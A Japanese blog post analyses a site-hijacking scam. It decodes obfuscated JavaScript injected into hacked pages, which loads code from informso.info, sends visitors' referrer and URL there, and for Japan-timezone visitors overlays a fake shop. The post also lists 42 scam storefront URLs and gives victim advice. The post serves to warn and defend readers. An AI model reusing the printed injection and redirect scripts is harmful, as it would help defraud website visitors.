(要約) 久しぶりに「中国ハッキング詐欺」のケースが知恵袋へ掲載されていました。 その事例から7400ページほどをクローリングした結果、42サイトを発見です。 http://c.statcounter.com/4440886/0/1c5b0b72/0/ 人閲覧者接続情報 http://www.robtex.com/ipinfo.gif久しぶりに「中国ハッキング詐欺」のケースが知恵袋へ掲載されていました。 ■ 外部スクリプト置き場となっているドメイン登録情報は次の通りですが、 この情報は虚偽の可能性があります。 ● 【 ドメイン登録情報 】[ドメイン基礎情報] ドメイン名:informso.info Whois サーバー:whois.godaddy.com 更新日:2016-03-13T01:21:52Z 作成日:2016-03-13T01:21:51Z 満了日:2017-03-13T01:21:51Z レジストラ:GoDaddy.com, LLC [ドメイン登録者] 氏名:Farrah Hussain 街区名:Sakyo-ku, Kyoto Iwakuranagatani town 都市名:Kyoto 州/県名:Tokyo 郵便番号:6060026 <== 京都府京都市左京区岩倉長谷町 国名:JP 電話番号:+81.9069643211 電子メール:storeonline274@outlook.com ※ 名前が日本人でない事と地番記載がない事から、この登録情報は虚偽の可能性があると判断しております。 見つかった仕掛けは、ハッキング先のページに1つのスクリプトを置いてあり そのスクリプトが外部のスクリプト2つを経由して、日本人だけを騙す手口となっていました。 ハッキング先のページに置いてあったスクリプトです。 http://brinkhall.fi/9r2m6z.jsi≫?var bcpfhz=String.fromCharCode(60,115,99,114,105,112,116,32,116,121,1 12,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34, 32,115,114,99,61,34,104,116,116,112,58,47,47,105,110,102,111,114,109,115 ,111,46,105,110,102,111,47,98,99,112,102,104,122,46,106,115,34,62,60,47, 115,99,114,105,112,116,62);document.write(bcpfhz); アスキーコードの数字で羅列してありますから文字に変換すると次のようになり 外部サイトへ置いてあるスクリプトを呼び出していると判明します。 i≫?var bcpfhz='<script type="text/javascript" src="http://informso.info/ bcpfhz.js"></script>';document.write(bcpfhz); 呼び出される外部サイトへ置いてあるスクリプトです。 http://informso.info/bcpfhz.jseval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))
+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/
^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e
=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegEx
p('\\b'+e(c)+'\\b','g'),k[c])}}return p}('s(d.c(n,7,1,g,1,0,5,0,1,9,0,2,
6,3,r,0,A,B,C,z,3,j,8,3,2,0,2,4,h,r,3,6,p,j,0,2,4,k,1,0,5,0,1,1,0,1,i,q)
);s(d.c(n,7,1,g,b,1,0,5,9,0,2,6,3,r,0,A,B,C,z,3,j,8,3,2,0,2,4,h,u,3,6,7,
4,e,3,2,k,b,1,0,5,i,q));s(d.c(n,7,1,g,l,3,2,0,9,h,2,0,H,g,K,7,4,0,h,i,k,
t,0,4,L,e,j,0,l,3,2,0,G,5,5,f,0,4,h,i,m,E,F,i,D,h,X,M,i,q));V a=d.c(x,f,
6,1,e,8,4,g,u,7,2,t,p,7,t,0,9,o,W,7,n,7,f,6,1,e,8,4,o,g,f,1,6,9,o,b,4,4,
8,S,m,m,e,2,5,3,1,j,f,3,k,e,2,5,3,m,y,6,8,5,b,l,k,8,b,8,N,P,p,0,1,R,9,6,
u,7,1,Q,f,O,y,6,8,5,b,l,v,1,0,5,0,1,9)+T+d.c(v,b,1,0,5,9)+Y+d.c(v,l,3,2,
0,9)+U+d.c(o,w,x,m,f,6,1,e,8,4,w);J.I(a)',61,61,'101|114|110|111|116|102
|99|97|112|61||104|fromCharCode|String|105|115|32|40|41|109|46|122|47|11
8|34|117|59|100|eval|103|108|38|62|60|98|67|85|82|73|42|54|48|79|119|wri
te|document|68|84|49|63|95|113|107|121|58|refer|zone|var|106|45|href'.sp
lit('|'),0,{}))
Dean Edwards' JS Packer でパッキングされていますので解毒します。 するとアスキーコードの数字で羅列してあるスクリプトが現れました。 eval(String.fromCharCode(118,97,114,32,114,101,102,101,114,61,101,110,99 ,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,1 17,109,101,110,116,46,114,101,102,101,114,114,101,114,41,59));eval(Strin g.fromCharCode(118,97,114,32,104,114,101,102,61,101,110,99,111,100,101,8 5,82,73,67,111,109,112,111,110,101,110,116,40,108,111,99,97,116,105,111, 110,46,104,114,101,102,41,59));eval(String.fromCharCode(118,97,114,32,12 2,111,110,101,61,40,110,101,119,32,68,97,116,101,40,41,46,103,101,116,84 ,105,109,101,122,111,110,101,79,102,102,115,101,116,40,41,47,54,48,41,42 ,40,45,49,41,59));var a=String.fromCharCode(60,115,99,114,105,112,116,32 ,108,97,110,103,117,97,103,101,61,34,106,97,118,97,115,99,114,105,112,11 6,34,32,115,114,99,61,34,104,116,116,112,58,47,47,105,110,102,111,114,10 9,115,111,46,105,110,102,111,47,98,99,112,102,104,122,46,112,104,112,63, 113,117,101,114,121,61,99,108,97,114,107,115,95,98,99,112,102,104,122,38 ,114,101,102,101,114,61)+refer+String.fromCharCode(38,104,114,101,102,61 )+href+String.fromCharCode(38,122,111,110,101,61)+zone+String.fromCharCo de(34,62,60,47,115,99,114,105,112,116,62);document.write(a) 上と同じように解毒すると、次のスクリプトになります。 var refer=encodeURIComponent(document.referrer);var href=encodeURICompon ent(location.href);var zone=(new Date().getTimezoneOffset()/60)*(-1);var a='<script language="javascript" src="http://informso.info/bcpfhz.php?q uery=clarks_bcpfhz&refer='+refer+'&href='+href+'&zone='+zone+'"></script >';document.write(a) 現れたスクリプトには仕掛けが施してあり、パソコンのタイムゾーンを付けないと機能しません。 機能するのは+9時間のタイムゾーンだけで、これは日本人だけを狙う仕掛けです。 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.r
eplace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[f
unction(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k
[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d 2=
(b e().f()/g)*(-1);a(2==9){4.3.5.6="<8 7=\'i%\' k=\'q\' r=\'s\' t=\'0\'
p=\'j://l.m.n/o-c-u.h\'>"}',31,31,'||tzo|document|top|body|innerHTML|wid
th|iframe||if|new||var|Date|getTimezoneOffset|60|html|100|http|scrolling
|www|tamncc|pw|category|src|no|height|6000|frameborder|25'.split('|'),0,
{}))
Dean Edwards' JS Packer でパッキングされていますので解毒します。 すると表示しているページ全体を上書きするスクリプトが現れました。 var tzo=(new Date().getTimezoneOffset()/60)*(-1);if(tzo==9){top.document
.body.innerHTML="<iframe width='100%' scrolling='no' height='6000' frame
border='0' src='http://www.tamncc.pw/category-c-25.html'>"}
つまり、最後のスクリプト解毒結果に現れたアドレスのサイトが詐欺サイトとなります。 上の事例を起点として7400ページほどをクローリングした結果、42サイトを発見です。 【品質保証】CLEDRAN 激安専門店! ⇒ http://www.binqos.pw/ 【品質保証】レスポートサック 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.bxugte.review/ 超美品スカーフ専門店,期間限定! ⇒ http://www.cdcdfz.top/ 【品質保証】ジョンスメドレー 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.chgnmb.review/ 【品質保証】オールデン 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.dcopzm.review/ 【品質保証】ムーレー 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.dvnekm.review/ 【2016 セール】電動ガン 最低価格で,が絶対見つかる! ⇒ http://www.ejtvjx.pw/ 【品質保証】ロロピアーナ!人気売れ筋ランキング! ⇒ http://www.enavzk.top/ 【品質保証】ゾンネ 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.erntvb.review/ 【品質保証】エンジェルクローバー 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.flirek.review/ 【品質保証】インコテックス 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.gxlrnj.review/ 品質保証 主要なブランドの音専門ストア! ⇒ http://www.gzfuyui.review/ 【2016 セール】ダコタ 最低価格で,が絶対見つかる! ⇒ http://www.hbcpar.pw/ 【品質保証】家具 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.hkzupq.review/ 【2016 セール】スロウ 最低価格で,が絶対見つかる! ⇒ http://www.jykiuyk.pw/ 【2016 セール】スケートボード 最低価格で,が絶対見つかる! ⇒ http://www.lkhvpmv.pw/ 【2016 セール】 洗濯機 最低価格で,が絶対見つかる! ⇒ http://www.mghema.pw/ 【品質保証】若者に大人気!キッチン 家電 史上最安値の人気通販店 ⇒ http://www.mlxfuqy.racing/ 【品質保証】マンダリナダック 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.ngbyfq.review/ 【2016 セール】アーメン最低価格で,が絶対見つかる! ⇒ http://www.oxobsk.pw/ 【品質保証】KOOS/コース 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.pqsmqj.review/ 人気満点 【ダントン】 ! 新作大特集 が買い安い! ⇒ http://www.rnwrava.space/ 最先端の ラルディーニ 販売店! いらっしゃいませ! ⇒ http://www.rtmpdt.pw/ 【2016 セール】スノーボード 最低価格で,が絶対見つかる! ⇒ http://www.smgrb.xyz/ 【2016 セール】 エルメス最低価格で,が絶対見つかる! ⇒ http://www.stbzbv.pw/ 【2016 セール】 ブランド靴 最低価格で,が絶対見つかる! ⇒ http://www.tamncc.pw/ 【品質保証】アルファ 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.tulzjj.review/ 【品質保証】カーナビゲーション専門店.若者に大人気!最安値に挑戦! ⇒ http://www.vfxvdkj.racing/ 【品質保証】フルラ 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.vjkqvj.review/ HTTP/1.1 302 Moved Temporarily ⇒ http://www.wiiatya.click/ 【2016 セール】 ギター 最低価格で,が絶対見つかる! ⇒ http://www.wxynhe.pw/ 【2016 セール】 スーツケース 最低価格で,が絶対見つかる! ⇒ http://www.wzcdxqe.online/ 大人気沸騰する 【コート】!【品質保証】 ⇒ http://www.wzhtjqo.xyz/ 新作激安登場!季節/生活家電/脱毛器 人気売れ筋ランキング 激安専門店! ⇒ http://www.wzwuauz.link/ 【品質保証】ストライダー 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.xosooe.review/ 【品質保証】アイソラ 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.xtnyus.review/ 特価高品質GPS!期間限定! ⇒ http://www.yjxeiq.top/ 【品質保証】ハリスツイード 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.ylytkt.review/ 新作激安登場!ベビー用品!人気売れ筋ランキング 激安専門店! ⇒ http://www.yrjzkcl.date/ 【品質保証】ジムフレックス 専門店.若者に大人気!最安値に挑戦! ⇒ http://www.zdmqod.review/ 【2016 セール】アインソフ 最低価格で,が絶対見つかる! ⇒ http://www.zmabzb.pw/ 人気満点 サーフボード! 新作大特集 が買い安い! ⇒ http://www.zppwnnc.faith/ 全部、ドメイン「informso.info」のスクリプトを経由するハッキング寄生ですから、 ファイアウォールに「informso.info」をブロック設定すると詐欺被害を防げます。 海外の詐欺に対しては、日本の警察に捜査権限がありません。 ■ クレジットカードでの支払いなら クレジット会社に連絡してクレジットカードの停止と再発行をしてください。 ■ クレジットカードの契約によっては犯罪被害補償を受けられることもあります。 詳しくはクレジット会社にお尋ねくださいね。 ■ 銀行振り込みなら、 送金先の銀行に上の情報を伝えて、相手口座の凍結をしてもらってください。 警察へ申請するように促された場合は、その指示に従い警察から凍結依頼するようにして下さい。 (残金があれば被害者で按分することになります) ■ 代引でもゴミを送り付けてくる可能性があります。 ご家族を含めて、不審な荷物は受け取らないように周知徹底しておいてくださいね。 ■ サイトへ登録した個人情報は、他の詐欺サイト開設に利用される恐れがあります。 もしサイトへの登録情報を削除できるようでしたら削除し、サイトへの登録情報を変更できるようでしたら、氏名、住所、電話番号などをデタラメなものに修正しておいてください。 ※ もよりの警察署の住所、電話番号を書いておくといいかも知れません。 投稿ネタはコレに決まり! 話題のキーワードをチェック!https, 年度末, 春休み, はまなす, ツイート, 枝垂れ桜, 早咲き, マツコ, 花冷え, 卒業式, 開花宣言, 自爆テロ, 寒の戻り, ダイヤ改正, 木蓮, image, 春分, お彼岸, カタクリ, 稀勢の里
|
全体表示








